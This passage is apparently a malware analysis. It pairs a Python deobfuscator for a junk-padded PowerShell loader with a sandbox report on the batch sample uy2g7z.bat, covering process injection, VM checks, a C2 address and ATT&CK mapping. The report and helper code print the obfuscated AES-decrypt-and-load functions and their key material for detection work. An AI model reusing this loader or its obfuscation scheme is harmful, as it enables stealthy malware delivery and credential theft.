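# literal the report wraps across two lines is rejoined with its space.
OBFUSCATED_SCRIPT = r"""
'$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', '')
'$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', '')
'$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', '')
'$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', '')
'$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', '')
'$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', '')
'$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', '')
'$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', '')
'$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', '')
'$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '')
"""


def strip_junk(literal, token):
    """Undo one .Replace('<token>', '').  str.replace scans left to right
    without overlap, the same semantics as .NET String.Replace, so the result
    is exactly the text Invoke-Expression received."""
    return literal.replace(token, "")


def deobfuscate(script_text):
    """Recover, in order, every statement the script builds for Invoke-Expression."""
    return [strip_junk(lit, tok) for lit, tok in REPLACE_RE.findall(script_text)]


def extract_aes_params(statements):
    """Return (key, iv) as bytes from the recovered statements; None for either not found."""
    found = {}
    for stmt in statements:
        m = AES_PARAM_RE.match(stmt)
        if m:
            found[m.group(1)] = base64.b64decode(m.group(2))
    return found.get("Key"), found.get("IV")


def decrypt_and_inflate(blob, key, iv):
    """Mirror of cuoF() followed by ppFM(): AES-CBC with PKCS7 padding, then
    GZip inflation, yielding the bytes the script hands to Assembly.Load.
    Needs the third-party 'cryptography' package; imported here so the
    deobfuscation helpers above work without it."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(blob) + decryptor.finalize()
    unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()
    return gzip.decompress(unpadder.update(padded) + unpadder.finalize())


if __name__ == "__main__":
    statements = deobfuscate(OBFUSCATED_SCRIPT)
    for s in statements:
        print(s)
    key, iv = extract_aes_params(statements)
    print(f"AES key: {len(key)} bytes ({len(key) * 8}-bit), IV: {len(iv)} bytes")
```

Run against the full echoed text rather than these fragments, the same regex recovers every `Invoke-Expression` statement; the registry write in `ZAB` is not padded and is readable as printed. Because `Invoke-Expression` compiles the cleaned literal as a new script block, PowerShell Script Block Logging (event 4104) records the de-junked statements, so the key and IV strings recovered here are usable as detection content for this sample without any decoding at query time.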
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuof($vrvb){ invoke-expression -verbose -debug '$tack=35[s35ys35te35m35.s35e35cu35r35i35t35y35.35c35ry35pt35o35g35r35ap35hy35.35a35e35s35]:35:35c35r35e35a35te35(35);'.replace('35', ''); invoke-expression -informationaction ignore '$tack.3smo3sde3s=[3ss3sys3st3sem3s.3ss3se3sc3su3sr3sit3sy.3sc3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sc3si3sp3sh3se3srm3so3sde3s]3s:3s:3sc3sbc3s;'.replace('3s', ''); invoke-expression -verbose -debug -informationaction ignore '$tack.srpasrddsrinsrgsr=[srssryssrtsresrmsr.srssresrcusrrisrtsrysr.srcrsrypsrtsrosrgsrrsrapsrhsrysr.srpsrasrddsrisrngsrmsrosrdsresr]:sr:srpsrksrcsrssr7;'.replace('sr', ''); invoke-expression -warningaction inquire -informationaction ignore '$tack.6ike6iy=6i[s6iy6ist6ie6im.6ic6io6in6iv6ie6ir6it]6i::6if6ir6io6imb6ias6ie6i66i46is6itr6ii6in6ig6i("6iex6iai6iqp6ih6ixc6ii6isa6iu6ir6ib6ic6il6i+6icb6i4j6i66iw6il6i4f6irm6ib6i76i/6i66ihb6ig6ir6ij6ih6i26ick6ii6i=");'.replace('6i', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$tack.pjivpj=[pjsypjspjtepjmpj.cpjopjnpjvpjepjrpjtpj]:pj:fpjrpjopjmpjbapjsepj6pj4pjspjtpjripjnpjgpj("pjlypjw7pjocpjepjgopj3pj6xpjzpjlpjqpjrpjepjepj5xpjlqpj=pj=");'.replace('pj', ''); $hznf=$tack.createdecryptor(); $gttc=$hznf.transformfinalblock($vrvb, 0, $vrvb.length); $hznf.dispose(); $tack.dispose(); $gttc;}function ppfm($vrvb){ invoke-expression -informationaction ignore -warningaction inquire -debug '$bybd=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw(,$vrvb);'.replace('uw', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose '$aohn=uwneuww-uwobuwjuwecuwtuw suwyuwsuwtuweuwmuw.uwiouw.muweuwmuwouwryuwstuwruweuwauwmuw;'.replace('uw', ''); invoke-expression -warningaction inquire -debug -informationaction ignore '$rqyh=qunequw-quobqujquecqutqu 
squyqusqutquequmqu.quioqu.cquoqumqupqurequssquiquoqunqu.qugzquiqupqusqutqurqueaqum($bybd, qu[iquo.qucoqumquprquequssquiquoqunqu.qucquoqumpqurequsqusquiquonqumoqudquequ]qu:qu:dquequcquoqumqupqurequsqus);'.replace('qu', ''); $rqyh.copyto($aohn); $rqyh.dispose(); $bybd.dispose(); $aohn.dispose(); $aohn.toarray();}function qigo($vrvb,$bchx){ invoke-expression -verbose -warningaction inquire '$lhpd=or[sorysorteormor.roreorfloreorcortorioroornor.aorssoreormorborlyor]:or:orlorooraord([byte[]]$vrvb);'.replace('or', ''); invoke-expression -debug -warningaction inquire '$aejb=$lhpd.obenobtrobypoboobinobt;'.replace('ob', ''); invoke-expression -debug '$aejbr9.ir9nvr9okr9er9($r9nr9ulr9lr9, $bchx);'.replace('r9', '');}function zab($lyat){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'vckcvwmmykqfoeskisq;mnfadyqrq;ovwrknedq'; set-itemproperty -path $registrypath -name 'vckcvwm
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: conhost.exe, 00000004.00000002.2734479178.00000281B6680000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2785504516.0000020D06380000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.1569314586.0000022FCF230000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Windows\System32\cmd.exe Code function: 3_3_000001D54F9E45D0 cpuid 3_3_000001D54F9E45D0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (12 entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (4 entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (2 entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Device\v4.0_4.0.0.0__b77a5c561934e089\System.Device.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-CDdDgiS8 VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-CDdDgiS8 VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA09070 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_000001D54FA09070
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 341 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 612 Process Injection | 2 Obfuscated Files or Information | 121 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 DLL Side-Loading | Security Account Manager | 143 System Information Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 4 Rootkit | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 612 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1637038, Sample: uy2g7z.bat, Start date: 13/03/2025, Architecture: WINDOWS, Score: 100)

Sample level: DNS/IP: ipwho.is. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected Powershell decrypt and execute; 6 other signatures.

Process tree recovered from the graph:
- cmd.exe (started) [Suspicious powershell command line found]
  - powershell.exe (started) [Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)]
    - cmd.exe (started) [Suspicious powershell command line found]
      - powershell.exe (started); network: 45.94.31.176, 4782, 49713, GBTCLOUDUS, Netherlands; ipwho.is 195.201.57.90, 443, 49714, HETZNER-ASDE, Germany [Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Hides that the sample has been downloaded from the Internet (zone.identifier); 3 other signatures]
        - winlogon.exe (injected) [Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures]
          - svchost.exe (injected) [Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes); Queries temperature or sensor information (via WMI often done to detect virtual machines)]
          - lsass.exe (injected) [Writes to foreign memory regions]
          - svchost.exe (injected); network: 192.168.2.10, 192.168.2.16, 192.168.2.9 (unknown)
          - 31 other processes (injected); network: 142.250.181.227, 49705, 80, GOOGLEUS, United States; 2.16.164.49, 49688, 49689, 49690, AKAMAI-ASN1EU, European Union
      - powershell.exe (started)
        - findstr.exe (started)
      - more.com (started)
      - 2 other processes (started)
  - conhost.exe (started)

Source | Detection | Scanner | Label
uy2g7z.bat | 2% | Virustotal |
uy2g7z.bat | 0% | ReversingLabs |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://microsoft.corosoft%20Time-Stamp%20PCA%202010(1).crl0 | 0% | Avira URL Cloud | safe
https://wns2-am3p.notify.windows.com/?token=AwYAAAAVHcznLkp9fcrV9Clhd2HepVc2%2fAlS973crXBsYmvJM5lgXx | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://ipwho.is/ | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.227 | unknown | United States | 15169 | GOOGLEUS | false
2.16.164.49 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false
45.94.31.176 | unknown | Netherlands | 395800 | GBTCLOUDUS | true
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
                                                                                IP
                                                                                192.168.2.10
                                                                                192.168.2.16
                                                                                192.168.2.9
                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1637038
                                                                                Start date and time:2025-03-13 10:24:36 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 11m 9s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:35
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:uy2g7z.bat
                                                                                Detection:MAL
                                                                                Classification:mal100.spyw.evad.winBAT@19/77@1/7
                                                                                EGA Information:
                                                                                • Successful, ratio: 84.2%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 75
                                                                                • Number of non-executed functions: 320
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .bat
                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 20.190.160.22, 20.190.160.132, 20.190.160.17, 40.126.32.76, 20.190.160.65, 20.190.160.66, 20.190.160.64, 20.190.160.20, 52.149.20.212, 150.171.27.10, 2.19.122.64, 172.202.163.200
                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, g.bing.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target dwm.exe, PID 992 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 8560 because it is empty
• Execution Graph export aborted for target winlogon.exe, PID 556 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:25:34 | API Interceptor | 153879x Sleep call for process: powershell.exe modified
05:26:26 | API Interceptor | 21331x Sleep call for process: svchost.exe modified
05:26:30 | API Interceptor | 9355x Sleep call for process: winlogon.exe modified
05:26:31 | API Interceptor | 27953x Sleep call for process: lsass.exe modified
05:26:34 | API Interceptor | 119585x Sleep call for process: dwm.exe modified
05:26:47 | API Interceptor | 718x Sleep call for process: spoolsv.exe modified
05:26:50 | API Interceptor | 596x Sleep call for process: cmd.exe modified
05:26:50 | API Interceptor | 677x Sleep call for process: more.com modified
05:26:50 | API Interceptor | 584x Sleep call for process: conhost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
2.16.164.49 | https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw%2FY29kZT01WnlSbjQ1WjhWVEw4VEc0eks4Wmo4dEo3WkJ4MWZhTm5PNHpKNENRZklkUGRrQzBlT0hDM3kj&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07 | malicious | HTMLPhisher | -
2.16.164.49 | Document 000325 Approval from All Saints C of E Primary School.htm | malicious | HTMLPhisher | -
2.16.164.49 | http://handlesandhinges.co.za/hgjpp/clan/ump/cKUu1tpNH1WB8aJqxqx1q/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292 | malicious | HTMLPhisher | -
2.16.164.49 | https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jfl | malicious | Unknown | -
2.16.164.49 | https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn | malicious | HtmlDropper | -
2.16.164.49 | https://eficensitcom-my.sharepoint.com/:f:/g/personal/prathyushap_eficensit_com/EmmWsEjkvfRJorJdypQBJdYBR0PBdaEDGU2Tg4-Q6_4WZw?e=8wSnKh&xsdata=MDV8MDJ8dGhvbWFzLmhvZXZlbEBoeWRyYXRpZ2h0LmNvbXwyZjliZjI0NTdmZDI0NDRiNzk1NzA4ZGNkMmYxZTdlNXwxNjAyYWU4MjAyNjY0MGQ2OTEwYjExNjgwZmUwZjZhNXwwfDB8NjM4NjE3MTgzNjU0MDEzNTQyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=UWhyaGFVOWYxMGt6Z1piU1hUTDdKa2VCeVdQWUZwd2NwR09TSmE2eC9xVT0%3d | malicious | HTMLPhisher | -
2.16.164.49 | https://onedrive.live.com/view.aspx?resid=7AEF24C2ECCBD3A%21123&authkey=!ABehDrl0wDeSrDg | malicious | Unknown | -
2.16.164.49 | https://bergtool-my.sharepoint.com/:f:/p/officemgr/EkAEY_TxWUpGjuhgV5jRSO8BD2acB1HjNb72Far_j2tXBg?e=T7fVyK | malicious | EvilProxy | -
2.16.164.49 | https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1 | malicious | HTMLPhisher | -
2.16.164.49 | San Xavier District of the Tohono O#U2019odham Nation.pdf | malicious | Unknown | -
195.201.57.90 | sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | Flash_USDT_Sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | Flash_USDT_Sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | SPt4FUjZMt.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLine | /?output=json
195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json
